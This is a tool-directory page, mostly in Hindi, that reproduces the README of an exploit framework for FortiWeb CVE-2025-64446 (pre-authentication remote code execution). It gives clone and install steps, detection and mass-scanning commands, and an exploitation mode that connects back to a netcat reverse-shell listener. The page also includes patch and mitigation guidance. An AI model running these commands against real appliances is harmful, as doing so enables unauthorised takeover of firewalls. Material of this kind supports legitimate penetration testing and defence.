Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — Security research tool for FortiWeb CVE-2025-64446 vulnerability. Automated exploitation framework with advanced logging, real-time metrics, proxy debugging, and professional reporting. Includes retry logic, multi-threading, and configurable settings. For authorized security testing only. CVSS 9.8 Critical. | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

Security research tool for FortiWeb CVE-2025-64446 vulnerability. Automated exploitation framework with advanced logging, real-time metrics, proxy debugging, and professional reporting. Includes retry logic, multi-threading, and configurable settings. For authorized security testing only. CVSS 9.8 Critical.

रिपॉजिटरी देखें
121 दिन पहलेअभी तक समीक्षित नहीं
साझा करें

FortiWeb CVE-2025-64446 RCE एक्सप्लॉइट

Python License CVSS CVE Status Version

पेशेवर सुरक्षा अनुसंधान और भेद्यता मूल्यांकन ढांचा

स्थापना · त्वरित प्रारंभ · उपयोग · आर्किटेक्चर · CLI संदर्भ · कानूनी और नैतिक अस्वीकरण


अवलोकन

FortiWeb Research Tool एक Python मूल्यांकन ढांचा है जो CVE-2025-64446 का अधिकृत पता लगाने और विश्लेषण करने के लिए है — यह एक गंभीर प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन समस्या है जो FortiWeb Web Application Firewall उपकरणों को प्रभावित करती है।

विशेषताविवरण
लेखकSudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8 (Critical)
वर्गप्रमाणीकरण बायपास + पाथ ट्रैवर्सल → मनमाना फ़ाइल अपलोड → RCE
प्रभावित7.6.7 / 7.8.7 / 8.0.2 से पहले के बिल्ड (आधिकारिक सलाह के अनुसार सत्यापित करें)
उपचारपैच किए गए FortiWeb रिलीज़ में अपग्रेड करें
भाषाPython 3.7+
प्रवेश बिंदुexploit.py

प्रमुख क्षमताएँ


भेद्यता सारांश

एंगेजमेंट स्कोपिंग से पहले Fortinet PSIRT से प्रभावित/फिक्स किए गए संस्करणों की हमेशा पुष्टि करें।


📸 स्क्रीनशॉट

उपयोगस्कैन परिणाम
डैशबोर्डस्कैन परिणाम

स्थापना

root@kitploit:~
git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

निर्भरताएँ

पैकेजभूमिका
,

वैकल्पिक (डेव): pytest, black, flake8, mypy, python-dotenv — requirements.txt देखें।


त्वरित प्रारंभ

root@kitploit:~
# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

नोट: एक्सप्लॉइटेशन मोड को --lhost की आवश्यकता होती है। जब आप पूर्ण श्रृंखला नहीं चलाना चाहते तो --detect-only या --safe-mode का उपयोग करें।


उपयोग गाइड

पहचान मोड

root@kitploit:~
python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

पहचान मोड पहुंच-क्षमता, संस्करण संकेत, API एक्सपोज़र, पाथ-ट्रैवर्सल संकेतक, ऑथ-बायपास सिग्नल और अपलोड-एंडपॉइंट पहुंच का मूल्यांकन करता है। इन संकेतकों के आधार पर जोखिम को Critical / High / Medium / Low के रूप में वर्गीकृत किया जाता है।

बड़े पैमाने पर स्कैनिंग

root@kitploit:~
cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

ScannerManager थ्रेड पूल के माध्यम से FortiWebScanner वर्कर चलाता है, एक Rich सारांश तालिका प्रिंट करता है, और scan_report.json / scan_report.html लिखता है।

एक्सप्लॉइटेशन मोड (केवल अधिकृत प्रयोगशालाओं में)

root@kitploit:~
# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

कॉन्फ़िगरेशन फ़ाइल

root@kitploit:~
# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
root@kitploit:~
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

CLI फ़्लैग YAML से लोड किए गए मानों को ओवरराइड करते हैं।


आर्किटेक्चर

root@kitploit:~
exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
घटकज़िम्मेदारी
FortiWebScannerपहुंच-क्षमता, संस्करण, CVE संकेतक जाँच

उच्च-स्तरीय सिंगल-टारगेट प्रवाह:

  1. बैनर / लॉगिंग सेटअप
  2. पहुंच-क्षमता और संस्करण जाँच
  3. संकेतक जाँच (या जब डिटेक्ट/सेफ मोड में न हों तो पूर्ण श्रृंखला)
  4. reports/ के अंतर्गत JSON + HTML रिपोर्ट
  5. जहाँ लागू हो सफाई

विशेषताएँ

पहचान

  • प्रबंधन API पथों के विरुद्ध पाथ-ट्रैवर्सल संकेतक जाँच
  • प्रमाणीकरण-बायपास सिग्नल जाँच
  • सामान्य स्टेटस/संस्करण एंडपॉइंट्स पर FortiWeb संस्करण प्रोबिंग
  • API एंडपॉइंट एक्सपोज़र मैपिंग
  • फ़ाइल-अपलोड एंडपॉइंट पहुंच जाँच
  • संयुक्त संकेतकों से जोखिम स्कोरिंग

रिपोर्टिंग और अवलोकनीयता

  • टाइमस्टैम्प सहित JSON और HTML रिपोर्ट
  • प्रति-अनुरोध मेट्रिक्स (स्थिति, विलंबता, सफलता दर)
  • अलग लॉग: exploit.log, errors.log, requests.log

परिचालन नियंत्रण

  • मल्टी-थ्रेडेड बड़े पैमाने पर स्कैनिंग (--threads)
  • HTTP/HTTPS प्रॉक्सी समर्थन (जैसे Burp)
  • कॉन्फ़िगर करने योग्य प्रयास/विलंब के साथ रीट्राइ (डिफ़ॉल्ट: 3 / 2s)
  • कस्टम User-Agent, टाइमआउट, SSL वेरिफाई टॉगल (--no-verify)
  • Colorama + Rich के माध्यम से रंगीन कंसोल आउटपुट

जनरेटेड आउटपुट

root@kitploit:~
reports/
├── report_YYYYMMDD_HHMMSS.json
├── report_YYYYMMDD_HHMMSS.html
├── scan_report.json
└── scan_report.html

logs/
├── exploit.log
├── errors.log
└── requests.log

नमूना JSON रिपोर्ट (पहचान)

root@kitploit:~
{
  "metadata": {
    "tool_name": "FortiWeb Research Tool",
    "version": "1.0",
    "author": "Sudeepa Wanigarathna",
    "timestamp": "2026-07-31T00:02:17",
    "mode": "detect"
  },
  "target": {
    "url": "https://192.168.1.100:8443",
    "reachable": true,
    "version": "7.6.0",
    "vulnerable": true,
    "risk_level": "Critical"
  },
  "metrics": {
    "total_requests": 12,
    "average_response_time": 0.42,
    "success_rate": 0.91
  }
}

कमांड संदर्भ

root@kitploit:~
python3 exploit.py [OPTIONS]

प्रोजेक्ट संरचना

root@kitploit:~
.
├── exploit.py           # Research tool (detect / scan / exploit)
├── config.yaml          # Example configuration
├── requirements.txt     # Python dependencies
├── reports/             # Generated JSON / HTML reports
├── logs/                # Runtime logs
├── LICENSE
├── SECURITY.md
├── .gitignore
└── README.md

शमन मार्गदर्शन

  1. FortiWeb को पैच किए गए रिलीज़ (7.6.7+, 7.8.7+, 8.0.2+, या वर्तमान PSIRT मार्गदर्शन) में अपग्रेड करें।
  2. प्रबंधन इंटरफेस को विश्वसनीय नेटवर्क / जंप होस्ट तक सीमित रखें।
  3. असामान्य पहुंच के लिए प्रमाणीकरण और मेंटेनेंस API गतिविधि की निगरानी करें।
  4. किसी भी पुष्टि किए गए एक्सपोज़र के बाद क्रेडेंशियल बदलें और अखंडता की समीक्षा करें।
  5. उपचार को मान्य करने के लिए पैचिंग के बाद --detect-only / --safe-mode फिर से चलाएँ।

कानूनी और नैतिक अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण, अनुसंधान और शिक्षा के लिए है।

  • केवल उन्हीं सिस्टम पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • ज़िम्मेदार डिस्क्लोज़र और बग-बाउंटी प्रोग्राम नियमों का पालन करें
  • अनधिकृत पहुंच, नुकसान या अवैध गतिविधि के लिए उपयोग न करें

इस सॉफ़्टवेयर का उपयोग करके आप पुष्टि करते हैं कि आपके पास अधिकार है, आप इसका दुरुपयोग नहीं करेंगे, और अपने कार्यों की पूर्ण ज़िम्मेदारी स्वीकार करते हैं। दुरुपयोग के लिए लेखक ज़िम्मेदार नहीं है।

इस प्रोजेक्ट से संबंधित निजी भेद्यता रिपोर्टिंग के लिए SECURITY.md देखें।


संसाधन

  • Fortinet PSIRT
  • सलाह: FG-IR-25-64446
  • पैच डाउनलोड
  • NVD: CVE-2025-64446

योगदान

  1. रिपॉजिटरी को फोर्क करें
  2. एक ब्रांच बनाएँ: git checkout -b feature/your-change
  3. स्पष्ट संदेश के साथ कमिट करें
  4. पुश करें और Pull Request खोलें

कृपया परिवर्तनों को केवल अधिकृत प्रयोगशाला वातावरण में मान्य करें और लाइव टारगेट डेटा, कुकीज़ या क्रेडेंशियल कमिट करने से बचें।


लाइसेंस

MIT लाइसेंस — LICENSE देखें।

कॉपीराइट (c) 2026 Sudeepa Wanigarathna


लेखक और सहायता

लेखकSudeepa Wanigarathna
समस्याएँइस रिपॉजिटरी के लिए GitHub Issues
सुरक्षाSECURITY.md देखें · [email protected]

केवल अधिकृत अनुसंधान · FortiWeb CVE-2025-64446

ऊपर जाएँ

टूल डाउनलोड करें
मोडफ़्लैग(s)उद्देश्य
पहचान--detect-onlyगैर-शोषणकारी भेद्यता संकेतक
सुरक्षित / केवल-पठन--safe-modeपरिवर्तन करने वाले एक्सप्लॉइट चरणों को छोड़ें
बड़े पैमाने पर स्कैन--targets + --scan-modeसमानांतर मल्टी-टारगेट मूल्यांकन
एक्सप्लॉइटेशन--target + --lhostकेवल अधिकृत प्रयोगशालाओं में नियंत्रित श्रृंखला
ड्राई रन--dry-runपरिवर्तन लागू किए बिना प्रवाह का अभ्यास करें
रिपोर्टिंग--output-dirJSON + HTML एंगेजमेंट रिपोर्ट
फ़ील्डमान
CVE IDCVE-2025-64446
CVSS स्कोर9.8 (Critical)
प्रभावसफल शोषण की स्थिति में पूर्ण सिस्टम से समझौता
समाधान7.6.7, 7.8.7, 8.0.2, या बाद के संस्करण में अपग्रेड करें
HTML आउटपुट
टर्मिनल आउटपुट
requests
urllib3
HTTP क्लाइंट
rich, colorama, tqdmटर्मिनल UI और प्रगति
pyyamlconfig.yaml लोडिंग
ScannerManager
समानांतर स्कैन, JSON/HTML रोलअप, सारांश तालिका
FortiWebExploitकॉन्फ़िग-संचालित सत्र, रीट्राइ, मेट्रिक्स, रिपोर्ट, वैकल्पिक एक्सप्लॉइट पथ
LogManagerसंरचित फ़ाइल लॉगिंग + रंगीन कंसोल
विकल्पविवरण
--target URLएकल FortiWeb बेस URL
--targets FILEन्यूलाइन-सेपरेटेड टारगेट सूची
--lhost IPलिसनर होस्ट (एक्सप्लॉइटेशन के लिए आवश्यक)
--lport PORTलिसनर पोर्ट (डिफ़ॉल्ट: 4444)
--config FILEYAML कॉन्फ़िगरेशन
--detect-onlyकेवल पहचान; एक्सप्लॉइट श्रृंखला छोड़ें
--scan-modeमल्टी-टारगेट स्कैन (--targets आवश्यक)
--safe-modeकेवल-पठन; परिवर्तन करने वाले चरणों को छोड़ें
--dry-runपरिवर्तन लागू किए बिना ड्राई रन
--timeout SECअनुरोध टाइमआउट (डिफ़ॉल्ट: 15)
--threads Nस्कैन वर्कर संख्या (डिफ़ॉल्ट: 5)
--proxy URLHTTP प्रॉक्सी
--user-agent STRकस्टम User-Agent
-v, --verboseविस्तृत लॉगिंग / कंसोल
--no-verifyTLS प्रमाणपत्र सत्यापन अक्षम करें
--output-dir DIRरिपोर्ट निर्देशिका (डिफ़ॉल्ट: reports)
--log-dir DIRलॉग निर्देशिका (डिफ़ॉल्ट: logs)
-h, --helpसहायता दिखाएँ